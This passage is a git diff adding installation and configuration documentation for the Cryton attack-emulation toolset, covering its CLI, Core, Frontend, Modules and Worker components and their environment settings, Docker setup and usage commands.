sure the app directory exists: + ```shell + mkdir -p ~/.local/cryton-cli/ + ``` + + Download the default settings into the app directory: + + === "curl" + + ```shell + curl -o ~/.local/cryton-cli/.env https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/{{{ git_release }}}/.env + ``` + + === "wget" + + ```shell + wget -O ~/.local/cryton-cli/.env https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/{{{ git_release }}}/.env + ``` + + Open the file and update it to your needs. + +??? tip "Overriding settings with Docker" + + <div id="settings-docker"></div> + + To override a variable use the `-e` or the `--env-file` option: + ``` + docker run -e CRYTON_CLI_API_HOST=127.0.0.1 --env-file relative/path/to/.env ... + ``` + + More information can be found [here](https://docs.docker.com/engine/reference/commandline/run/#env){target="_blank"}. + +??? tip "Overriding settings with Docker compose" + + <div id="settings-compose"></div> + + Override variables in the `environment` or the `env_file` attribute: + ``` + services + service: + environment: + - CRYTON_CLI_API_HOST=127.0.0.1 + env_file: + - relative/path/to/.env + ``` + + More information can be found [here](https://docs.docker.com/compose/environment-variables/set-environment-variables/#use-the-environment-attribute){target="_blank"}. + +### Available settings + +#### CRYTON_CLI_TIME_ZONE +[Timezone](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones){target="_blank"} used for scheduling (for example when +scheduling a Run). Use the `AUTO` value to use your system timezone. + +| value | default | example | +|--------|---------|---------------| +| string | AUTO | Europe/Prague | + +#### CRYTON_CLI_API_HOST +Cryton Core's API address. + +| value | default | example | +|--------|-----------|------------------| +| string | 127.0.0.1 | cryton-core.host | + +#### CRYTON_CLI_API_PORT +Cryton Core's API port. + +| value | default | example | +|-------|---------|---------| +| int | 8000 | 8008 | + +#### CRYTON_CLI_API_SSL +Use SSL to connect to REST API. + +| value | default | example | +|----------|---------|---------| +| boolean | false | true | + +#### CRYTON_CLI_API_ROOT +REST API URL. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|---------|-----------| +| string | api/ | api/path/ | + +#### CRYTON_CLI_APP_DIRECTORY +Path to the Cryton CLI directory. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|----------------------|---------------| +| string | ~/.local/cryton-cli/ | /path/to/app/ | + +!!! info "" + + The default value in Docker is set to `/app`. + +## Installation + +### With pipx +Cryton CLI is available in the [PyPI](https://pypi.org/project/cryton-cli/){target="_blank"} and can be installed using *pip*. +However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/){target="_blank"}. + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [pipx](https://pypa.github.io/pipx/){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + - Enable [shell completion](#shell-completion) + +Install the app: + +=== "pipx" + + ```shell + pipx install cryton-cli + ``` + +=== "pip" + + ```shell + pip install --user cryton-cli + ``` + +### With Docker +Cryton CLI is available as a Docker image and can be installed using Docker. + +!!! danger "Requirements" + + - [Docker](https://docs.docker.com/engine/install/){target="_blank"} + +!!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + - If you're using persistent settings, switch to the [app directory](#cryton_cli_app_directory) and [pass the settings](#settings-docker) + +Run the container and enter an interactive shell: +```shell +docker run -it --network host registry.gitlab.ics.muni.cz:443/cryton/cryton-cli:{{{ release_version }}} +``` + +### With Docker Compose +Example Docker Compose configuration is also available. + +!!! danger "Requirements" + + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + +!!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + - If you're using persistent settings, switch to the [app directory](#cryton_cli_app_directory) and [pass the settings](#settings-compose) + +??? tip "Switch to the app directory" + + ```shell + mkdir -p ~/.local/cryton-cli/ + cd ~/.local/cryton-cli/ + ``` + +Download the configuration using: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +Run the container and enter an interactive shell: +``` +docker compose run cryton_cli +``` + +## Usage +Use the following to invoke the app: +```shell +cryton-cli +``` + +You should see a help page: +``` +Usage: cryton-cli [OPTIONS] COMMAND [ARGS]... + + A CLI wrapper for Cryton API. + +Options: + ... +``` + +To learn about each command's options use: +```shell +cryton-cli <your command> --help +``` + +??? question "How to change the default API host/port?" + + To change the default API host/port use *-H* and *-p* options. + ```shell + cryton-cli -H 127.0.0.1 -p 8000 <your command> + ``` + +## Shell completion +Shell completion is available for the *Bash*, *Zsh*, and *Fish* shell and has to be manually enabled. + +!!! info "" + + - To enable the shell completion, the tool must be present + - The shell completion is enabled in Docker by default + +First, make sure the app directory exists: + +=== "Bash" + + ```shell + mkdir -p ~/.local/cryton-cli/ + ``` + +=== "Zsh" + + ```shell + mkdir -p ~/.local/cryton-cli/ + ``` + +Generate, save, and load the completion script: + +=== "Bash" + + ```shell + _CRYTON_CLI_COMPLETE=bash_source cryton-cli > ~/.local/cryton-cli/cryton-cli-complete.bash + echo ". ~/.local/cryton-cli/cryton-cli-complete.bash" >> ~/.bashrc + ``` + +=== "Zsh" + + ```shell + _CRYTON_CLI_COMPLETE=zsh_source cryton-cli > ~/.local/cryton-cli/cryton-cli-complete.zsh + echo ". ~/.local/cryton-cli/cryton-cli-complete.zsh" >> ~/.zshrc + ``` + +=== "Fish" + + ```shell + _CRYTON_CLI_COMPLETE=fish_source cryton-cli > ~/.config/fish/completions/cryton-cli-complete.fish + ``` + +You may need to restart your shell for the changes to take effect. diff --git a/docs/components/core.md b/docs/components/core.md new file mode 100644 index 0000000000000000000000000000000000000000..98242ec13f9dbc0be7e964c749dc8794af1f21c8 --- /dev/null +++ b/docs/components/core.md @@ -0,0 +1,463 @@ +## Description +Cryton Core is the center point of the Cryton toolset. It is used for: + +- Creating, planning, and scheduling attack scenarios +- Generating reports +- Controlling Workers and scenarios execution + +[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-core){target="_blank"}. + +## Settings +Cryton Core uses environment variables for its settings. Please update them to your needs. + +### Overriding settings +To override the settings, use the `export` command: +```shell +export CRYTON_CORE_RABBIT_USERNAME=cryton +``` + +!!! note "" + + Use `unset` to remove a variable. + +!!! tip "" + + Some settings can be overridden using the CLI. Try using: + ``` + cryton-core help <your command> + ``` + +??? tip "Overriding settings permanently" + + <div id="settings-permanent"></div> + + First, make sure the [app directory](#cryton_core_app_directory) exists: + ```shell + mkdir -p ~/.local/cryton-core/ + ``` + + Download the default settings into the app directory: + + === "curl" + + ```shell + curl -o ~/.local/cryton-core/.env https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/.env + ``` + + === "wget" + + ```shell + wget -O ~/.local/cryton-core/.env https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/.env + ``` + + Open the file and update it to your needs. + +??? tip "Overriding settings with Docker" + + <div id="settings-docker"></div> + + To override a variable use the `-e` or the `--env-file` option: + ``` + docker run -e CRYTON_CORE_RABBIT_USERNAME=cryton --env-file relative/path/to/.env ... + ``` + + More information can be found [here](https://docs.docker.com/engine/reference/commandline/run/#env){target="_blank"}. + +??? tip "Overriding settings with Docker compose" + + <div id="settings-compose"></div> + + Override variables in the `environment` or the `env_file` attribute: + ``` + services + service: + environment: + - CRYTON_CORE_RABBIT_USERNAME=cryton + env_file: + - relative/path/to/.env + ``` + + More information can be found [here](https://docs.docker.com/compose/environment-variables/set-environment-variables/#use-the-environment-attribute){target="_blank"}. + +### Available settings + +#### CRYTON_CORE_RABBIT_HOST +RabbitMQ server host. + +| value | default | example | +|--------|-----------|---------------| +| string | 127.0.0.1 | cryton-rabbit | + +#### CRYTON_CORE_RABBIT_PORT +RabbitMQ server port. + +| value | default | example | +|-------|---------|---------| +| int | 5672 | 15672 | + +#### CRYTON_CORE_RABBIT_USERNAME +Username for RabbitMQ server login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | admin | + +#### CRYTON_CORE_RABBIT_PASSWORD +Password for RabbitMQ server login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | mypass | + +#### CRYTON_CORE_DB_HOST +Postgres server host. + +| value | default | example | +|--------|-----------|------------------| +| string | 127.0.0.1 | cryton-pgbouncer | + +#### CRYTON_CORE_DB_PORT +Postgres server port. + +| value | default | example | +|-------|---------|---------| +| int | 5432 | 15432 | + +#### CRYTON_CORE_DB_NAME +Used Postgres database name. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|---------|-----------| +| string | cryton | cryton_db | + +#### CRYTON_CORE_DB_USERNAME +Username for Postgres server login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | user | + +#### CRYTON_CORE_DB_PASSWORD +Password for Postgres server login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | passwd | + +#### CRYTON_CORE_Q_ATTACK_RESPONSE +Queue name for processing attack responses. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|-----------------------------|--------------------------------| +| string | cryton_core.attack.response | cryton_core.attack.response.id | + +#### CRYTON_CORE_Q_AGENT_RESPONSE +Queue name for processing agent responses. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|----------------------------|-------------------------------| +| string | cryton_core.agent.response | cryton_core.agent.response.id | + +#### CRYTON_CORE_Q_EVENT_RESPONSE +Queue name for processing event responses. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|----------------------------|-------------------------------| +| string | cryton_core.event.response | cryton_core.event.response.id | + +#### CRYTON_CORE_Q_CONTROL_REQUEST +Queue name for processing control requests. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|-----------------------------|--------------------------------| +| string | cryton_core.control.request | cryton_core.control.request.id | + +#### CRYTON_CORE_DEBUG +Make Core run with debug output. + +| value | default | example | +|---------|---------|---------| +| boolean | false | true | + +#### CRYTON_CORE_DEFAULT_RPC_TIMEOUT +Timeout (in seconds) for RabbitMQ RPC requests. + +| value | default | example | +|-------|---------|---------| +| int | 120 | 200 | + +#### CRYTON_CORE_API_SECRET_KEY +Key (64 chars) used by REST API for cryptographic signing. +More information can be found [here](https://docs.djangoproject.com/en/4.1/ref/settings/#secret-key){target="_blank"}. + +| value | default | example | +|--------|---------|----------------------| +| string | cryton | XF37..56 chars..6HB3 | + +#### CRYTON_CORE_API_ALLOWED_HOSTS +Domain names that the site can serve. **(do not change, if you don't know what you're doing)** +More information can be found [here](https://docs.djangoproject.com/en/4.1/ref/settings/#allowed-hosts){target="_blank"}. + +| value | default | example | +|------------------------------------|---------|------------| +| list of strings separated by space | * | host host2 | + +#### CRYTON_CORE_API_STATIC_ROOT +Directory for storing static files. **(do not change, if you don't know what you're doing)** +More information can be found [here](https://docs.djangoproject.com/en/4.0/ref/settings/#static-root){target="_blank"}. + +| value | default | example | +|--------|--------------------------------|------------------------------| +| string | /usr/local/apache2/web/static/ | /var/www/example.com/static/ | + +#### CRYTON_CORE_API_USE_STATIC_FILES +Whether to serve static files or not. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|---------|---------|---------| +| boolean | false | true | + +#### CRYTON_CORE_CPU_CORES +The maximum number of CPU cores (processes) Cryton Core can utilize. **(do not change, if you don't know what you're doing)** +This affects the speed of starting/consuming Steps/Rabbit requests. Set the value to `auto` for the best CPU utilization. + +| value | default | example | +|-------|---------|---------| +| int | 3 | 2 | + +#### CRYTON_CORE_EXECUTION_THREADS_PER_PROCESS +How some payloads or Rabbit's channel consumers should be distributed. **(do not change, if you don't know what you're doing)** +This affects the speed of starting/consuming Steps/Rabbit requests. + +| value | default | example | +|-------|---------|---------| +| int | 7 | 5 | + +#### CRYTON_CORE_APP_DIRECTORY +Path to the Cryton Core directory. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|-----------------------|---------------| +| string | ~/.local/cryton-core/ | /path/to/app/ | + +!!! info "" + + The default value in Docker is set to `/app`. + +## Prerequisites +Cryton Core requires the following technologies to run properly: + +- [PostgreSQL database](https://www.postgresql.org/download/){target="_blank"} +- [RabbitMQ server](https://www.rabbitmq.com/download.html){target="_blank"} +- [PgBouncer](https://www.pgbouncer.org/install.html){target="_blank"} + +To make the installation process smoother the prerequisites are bundled within the [Docker Compose](#with-docker-compose) installation. + +??? question "Want to use pipx or Docker, but don't want to install and set up the prerequisites on your own?" + + !!! danger "Requirements" + + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + + !!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + + First, you have to create [permanent settings](#settings-permanent). Then, switch to the app directory: + ```shell + cd ~/.local/cryton-core/ + ``` + + Download the Compose configuration: + + === "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/docker-compose.prerequisites.yml + ``` + + === "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/docker-compose.prerequisites.yml + ``` + + Run the Compose configuration: + ``` + docker compose -f docker-compose.prerequisites.yml up -d + ``` + +## Installation + +### With Docker Compose +The easiest way to install Cryton Core (and its prerequisites) is to use the example Docker Compose configuration. + +!!! danger "Requirements" + + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + - Create [permanent settings](#settings-permanent) + - Update the following settings: + 1. CRYTON_CORE_RABBIT_HOST=cryton-rabbit + 2. CRYTON_CORE_DB_HOST=cryton-pgbouncer + 3. CRYTON_CORE_API_USE_STATIC_FILES=true + +!!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + +First, switch to the app directory: +```shell +cd ~/.local/cryton-core/ +``` + +Download the Compose configuration: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +Run the Compose configuration: +``` +docker compose up -d +``` + +??? question "What should the output look like?" + + ``` + [+] Running 6/6 + ⠿ Network cryton-core_default Created + ⠿ Container cryton-rabbit Healthy + ⠿ Container cryton-db Healthy + ⠿ Container cryton-pgbouncer Healthy + ⠿ Container cryton-core Started + ⠿ Container cryton-proxy Started + ``` + +Check if the installation was successful and the app is running with curl: +``` +curl localhost:8000/api/ +``` + +??? question "What should the output look like?" + + ``` + {"runs":"http://localhost:8000/cryton/api/v1/runs/","plans":"http://localhost:8000/cryton/api/v1/plans/", + "plan_executions":"http://localhost:8000/cryton/api/v1/plan_executions/","stages":"http://localhost:8000/cryton/api/v1/stages/", + "stage_executions":"http://localhost:8000/cryton/api/v1/stage_executions/","steps":"http://localhost:8000/cryton/api/v1/steps/", + "step_executions":"http://localhost:8000/cryton/api/v1/step_executions/","workers":"http://localhost:8000/cryton/api/v1/workers/"} + ``` + +### With pipx +Cryton Core is available in the [PyPI](https://pypi.org/project/cryton-core/) and can be installed using *pip*. +However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/). + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [pipx](https://pypa.github.io/pipx/){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + +Install the app: + +=== "pipx" + + ```shell + pipx install cryton-core + ``` + +=== "pip" + + ```shell + pip install --user cryton-core + ``` + +### With Docker +Cryton Core is available as a Docker image and can be installed using Docker. + +!!! danger "Requirements" + + - [Docker](https://docs.docker.com/engine/install/){target="_blank"} + +!!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + - If you're using persistent settings, switch to the [app directory](#cryton_core_app_directory) and [pass the settings](#settings-docker) + +Run the container: +```shell +docker run -d registry.gitlab.ics.muni.cz:443/cryton/cryton-core:{{{ release_version }}} +``` + +!!! warning "Limitations" + + The easiest way to make the container accessible from the outside and to allow the container to access the prerequisites is to use the `--network host` option: + ```shell + docker run --network host -d registry.gitlab.ics.muni.cz:443/cryton/cryton-core:{{{ release_version }}} + ``` + +## Usage + +!!! info "" + + If you're using Docker (Compose) to install the app, you don't need to migrate the database or start the services mentioned in this section. + +Use the following to invoke the app: +```shell +cryton-core +``` + +You should see a help page: +``` +Type 'cryton-core help <subcommand>' for help on a specific subcommand. + +Available subcommands: +... +``` + +To learn about each command's options use: +```shell +cryton-core help <your command> +``` + +Before we do anything, **we need to migrate the database**: +```shell +cryton-core migrate +``` + +To be able to use Cryton Core, we need to start the REST API and RabbitMQ listener. We can do both using: +```shell +cryton-core start +``` + +??? question "How to change the default API host/port?" + + To change the default API host/port use the *--bind* option. + ```shell + cryton-core start --bind <address>:<port> + ``` + +### REST API and control +REST API is the only way to communicate with Cryton Core. It is by default running at +[http://0.0.0.0:8000](http://0.0.0.0:8000){target="_blank"}. Interactive documentation can be found at +[http://0.0.0.0:8000/doc](http://0.0.0.0:8000/doc){target="_blank"}. + +To be able to control Cryton Core, you have to send requests to its REST API. This can be done manually, or via [Cryton CLI](cli.md) or [Cryton Frontend](frontend.md). + +## Troubleshooting + +???+ question "Unable to load the interactive REST API?" + + If you're not using a reverse proxy, set `CRYTON_CORE_API_USE_STATIC_FILES=false`. diff --git a/docs/components/frontend.md b/docs/components/frontend.md new file mode 100644 index 0000000000000000000000000000000000000000..26ddfd28766c565e0eb72a0f20b1fc1617d2811d --- /dev/null +++ b/docs/components/frontend.md @@ -0,0 +1,170 @@ +## Description +Cryton Frontend is a graphical interface used to interact with [Cryton Core](core.md) (its API). + +[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-frontend){target="_blank"}. + +## Settings +Cryton Frontend uses environment variables for its settings. Please update them to your needs. + +!!! warning "Notice" + + For now, settings can be changed only for the [npm installation](#with-npm). + However, it is possible to update the API host and port at runtime at + [http://localhost:8080/app/user/settings](http://localhost:8080/app/user/settings){target="_blank"}. + +Variables can be found in `src/environments/`. For production modify the _environment.prod.ts_ file, else modify the _environment.ts_ file. + +#### crytonRESTApiHost +Cryton Core's API address. + +| value | default | example | +|--------|-----------|------------------| +| string | 127.0.0.1 | cryton-core.host | + +#### crytonRESTApiPort +Cryton Core's API port. + +| value | default | example | +|-------|---------|---------| +| int | 8000 | 8008 | + +#### refreshDelay +Sets artificial delay in milliseconds for refresh API requests. + +??? question "What is this for?" + + Users usually react better if the requests don't happen instantly, but they can see a tiny bit of loading. + Initial API request doesn't use delay, this is only for refreshing data + +| value | default | example | +|-------|---------|---------| +| int | 300 | 500 | + +#### useHttps +Use SSL to connect to REST API. + +| value | default | example | +|---------|---------|---------| +| boolean | false | true | + +## Installation + +### With Docker +Cryton Frontend is available as a Docker image and can be installed using Docker. + +!!! danger "Requirements" + + - [Docker](https://docs.docker.com/engine/install/){target="_blank"} + +!!! tip "Recommendations" + + - [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + +[//]: # ( - Override the [settings](#settings)) + +Run the front end in the background: +```shell +docker run -d -p 127.0.0.1:8080:80 registry.gitlab.ics.muni.cz:443/cryton/cryton-frontend:{{{ release_version }}} +``` + +### With Docker Compose +Example Docker Compose configuration is also available. + +!!! danger "Requirements" + + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + +!!! tip "Recommendations" + + - [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + +[//]: # ( - Override the [settings](#settings)) + +??? tip "Create a new directory" + + ```shell + mkdir cryton-frontend + cd cryton-frontend + ``` + +Download the configuration using: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-frontend/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-frontend/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +Run the Compose configuration: +``` +docker compose up -d +``` + +### With npm +Even though the front end can be installed using npm, it is **not recommended**. + +!!! danger "Requirements" + + - [npm](https://nodejs.org/en/){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + +Clone the repository: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-frontend.git +cd cryton-frontend +``` + +Install the dependencies: +```shell +npm install +``` + +Serve the app: +=== "Testing" + + ```shell + ng serve --port 8080 + ``` + +=== "Production" + + ```shell + ng serve --prod --port 8080 + ``` + +!!! warning "" + + Use `ng serve` only for development/testing. In a real production environment use either Docker (compose) installation or a + production build deployed on a production-ready web server (for example Nginx). + +??? info "Build the app" + + You can find the build in the **/dist** folder. + + === "Testing" + + ```shell + npm run build + ``` + + === "Production" + + ```shell + npm run build-prod + ``` + +## Usage +By default, the Frontend is served at [http://localhost:8080/](http://localhost:8080/){target="_blank"}. + +Use the in-app help pages to learn about usage. + +[//]: # (TODO: make a video) diff --git a/docs/components/modules.md b/docs/components/modules.md new file mode 100644 index 0000000000000000000000000000000000000000..5a907ad128d51e550eec1f4bfe1c18b089dfe34d --- /dev/null +++ b/docs/components/modules.md @@ -0,0 +1,63 @@ +## Description +Cryton (attack) modules are a collection of Python scripts with the goal of orchestrating known offensive security tools +(Nmap, Metasploit, medusa, etc.). Although this is their intended purpose, they are still Python scripts, and therefore +any custom-made script can be used similarly. + +!!! note "" + + Do not forget that the modules can be used for other purposes other than attacking. + +[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-modules){target="_blank"}. + +## Installation +Modules are automatically installed on [Worker](worker.md)'s start-up, you just need to download and **move them to the [Worker's app directory](worker.md#cryton_worker_app_directory)**. + +!!! warning "" + + The system requirements for each module have to be **installed manually** as specified in each module's README [here](#availablemodules). + + However, if you're using [Worker's Kali image](worker.md#with-docker) the requirements are already satisfied for the official modules. + If the Worker is deployed on a fully-fledged Kali OS, the need to install the system requirements **SHOULD** be also gone. Neither the less, you should check if they're satisfied. + +### With git +!!! danger "Requirements" + + - [Git](https://git-scm.com/){target="_blank"} + +Clone the repository and checkout the correct version: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-modules.git +cd cryton-modules +git checkout {{{ git_release }}} +``` + +Make sure the Worker's app directory exists and copy the modules into it: +```shell +mkdir -p +cp -r modules ~/.local/cryton-worker/ +``` + +### Manually +Go to the [repository](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/tree/{{{ git_release }}}){target="_blank"} and download it: + + + +Finally, extract the `modules` directory from the archive to Worker's app directory (`~/.local/cryton-worker/`). + +## Usage +Modules are primarily targeted for use with [Cryton Worker](worker.md). +Once the Worker receives an execution request, it imports a module, runs it with the supplied arguments, and saves its output. + +Even though the modules are Python scripts and can be installed and executed manually, some of them use the Worker's +[prebuilt functionality](../development/modules.md#prebuilt-functionality), which means you have to run them +in the same virtual environment as Cryton Worker. + +## Available modules +Here is a curated list of modules. Please see each module's readme for more information. + +- [mod_cmd](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_cmd/README.md){target="_blank"} +- [mod_script](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_script/README.md){target="_blank"} +- [mod_medusa](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_medusa/README.md){target="_blank"} +- [mod_msf](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_msf/README.md){target="_blank"} +- [mod_nmap](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_nmap/README.md){target="_blank"} +- [mod_wpscan](https://gitlab.ics.muni.cz/cryton/cryton-modules/-/blob/master/modules/mod_wpscan/README.md){target="_blank"} diff --git a/docs/components/worker.md b/docs/components/worker.md new file mode 100644 index 0000000000000000000000000000000000000000..b0392d76b3fe644aae041b8baf43f4c50d553038 --- /dev/null +++ b/docs/components/worker.md @@ -0,0 +1,479 @@ +## Description +Cryton Worker is used for executing [attack modules](modules.md) remotely. It consumes messages from [Cryton Core](core.md) through the +[RabbitMQ](https://www.rabbitmq.com/){target="_blank"}. + +[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-worker){target="_blank"}. + +## Settings +Cryton Worker uses environment variables for its settings. Please update them to your needs. + +### Overriding settings +To override the settings, use the `export` command: +```shell +export CRYTON_WORKER_NAME=name +``` + +!!! note "" + + Use `unset` to remove a variable. + +!!! tip "" + + Some settings can be overridden using the CLI. Try using: + ``` + cryton-worker start --help + ``` + +??? tip "Overriding settings permanently" + + <div id="settings-permanent"></div> + + First, make sure the app directory exists: + ```shell + mkdir -p ~/.local/cryton-worker/ + ``` + + Download the default settings into the app directory: + + === "curl" + + ```shell + curl -o ~/.local/cryton-worker/.env https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/{{{ git_release }}}/.env + ``` + + === "wget" + + ```shell + wget -O ~/.local/cryton-worker/.env https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/{{{ git_release }}}/.env + ``` + + Open the file and update it to your needs. + +??? tip "Overriding settings with Docker" + + <div id="settings-docker"></div> + + To override a variable use the `-e` or the `--env-file` option: + ``` + docker run -e CRYTON_WORKER_NAME=name --env-file relative/path/to/.env ... + ``` + + More information can be found [here](https://docs.docker.com/engine/reference/commandline/run/#env){target="_blank"}. + +??? tip "Overriding settings with Docker compose" + + <div id="settings-compose"></div> + + Override variables in the `environment` or the `env_file` attribute: + ``` + services + service: + environment: + - CRYTON_WORKER_NAME=name + env_file: + - relative/path/to/.env + ``` + + More information can be found [here](https://docs.docker.com/compose/environment-variables/set-environment-variables/#use-the-environment-attribute){target="_blank"}. + +### Available settings + +#### CRYTON_WORKER_NAME +Unique name used to identify the Worker. + +| value | default | example | +|--------|---------|-----------| +| string | worker | my_worker | + +#### CRYTON_WORKER_MODULES_DIR +Path to the directory containing the modules. + +| value | default | example | +|--------|----------------------------------|------------------------------| +| string | /path/to/cryton-modules/modules/ | /opt/cryton-modules/modules/ | + +#### CRYTON_WORKER_DEBUG +Make Worker run in debug mode. + +| value | default | example | +|---------|---------|---------| +| boolean | false | true | + +#### CRYTON_WORKER_INSTALL_REQUIREMENTS +Install requirements.txt for each module on startup. + +| value | default | example | +|---------|---------|---------| +| boolean | true | false | + +#### CRYTON_WORKER_CONSUMER_COUNT +The number of consumers used for Rabbit communication (more equals faster request processing and heavier processor usage). + +| value | default | example | +|-------|---------|---------| +| int | 7 | 3 | + +#### CRYTON_WORKER_PROCESSOR_COUNT +The number of processors used for internal requests (more equals faster internal requests processing, but heavier processor usage). + +| value | default | example | +|-------|---------|---------| +| int | 7 | 3 | + +#### CRYTON_WORKER_MAX_RETRIES +How many times to try to re-connect to RabbitMQ when the connection is lost. + +| value | default | example | +|-------|---------|---------| +| int | 3 | 5 | + +#### CRYTON_WORKER_MSFRPCD_HOST +Metasploit Framework RPC host. + +| value | default | example | +|-------|-----------|-------------| +| str | 127.0.0.1 | msfrpc.host | + +#### CRYTON_WORKER_MSFRPCD_PORT +Metasploit Framework RPC port. + +| value | default | example | +|-------|---------|---------| +| int | 55553 | 55554 | + +#### CRYTON_WORKER_MSFRPCD_SSL +Use SSL to connect to Metasploit Framework RPC. + +| value | default | example | +|---------|---------|---------| +| boolean | true | false | + +#### CRYTON_WORKER_MSFRPCD_USERNAME +Username for Metasploit Framework RPC login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | msf | + +#### CRYTON_WORKER_MSFRPCD_PASSWORD +Password for Metasploit Framework RPC login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | toor | + +#### CRYTON_WORKER_RABBIT_HOST +RabbitMQ server host. + +| value | default | example | +|--------|-----------|-------------| +| string | 127.0.0.1 | rabbit.host | + +#### CRYTON_WORKER_RABBIT_PORT +RabbitMQ server port. + +| value | default | example | +|-------|---------|---------| +| int | 5672 | 15672 | + +#### CRYTON_WORKER_RABBIT_USERNAME +Username for RabbitMQ server login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | admin | + +#### CRYTON_WORKER_RABBIT_PASSWORD +Password for RabbitMQ server login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | mypass | + +#### CRYTON_WORKER_EMPIRE_HOST +Empire server host. + +| value | default | example | +|--------|-----------|-------------| +| string | 127.0.0.1 | empire.host | + +#### CRYTON_WORKER_EMPIRE_PORT +Empire server port. + +| value | default | example | +|-------|---------|---------| +| int | 1337 | 11337 | + +#### CRYTON_WORKER_EMPIRE_USERNAME +Username for Empire server login. + +| value | default | example | +|--------|---------|-------------| +| string | cryton | empireadmin | + +#### CRYTON_WORKER_EMPIRE_PASSWORD +Password for Empire server login. + +| value | default | example | +|--------|---------|-------------| +| string | cryton | password123 | + +#### CRYTON_WORKER_APP_DIRECTORY +Path to the Cryton Worker directory. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|-------------------------|---------------| +| string | ~/.local/cryton-worker/ | /path/to/app/ | + +!!! info "" + + The default value in Docker is set to `/app`. + +## Prerequisites +Cryton Worker requires the following technologies to run properly: + +- [Metasploit Framework](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html){target="_blank"} +- [Empire C2](https://bc-security.gitbook.io/empire-wiki/quickstart/installation){target="_blank"} + +To make the installation process smoother the prerequisites are bundled within the [Docker Compose](#with-docker-compose) installation. + +## Installation + +### With Docker Compose +The easiest way to install Cryton Worker (and its prerequisites) is to use the example Docker Compose configuration. + +!!! danger "Requirements" + + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + - Install the 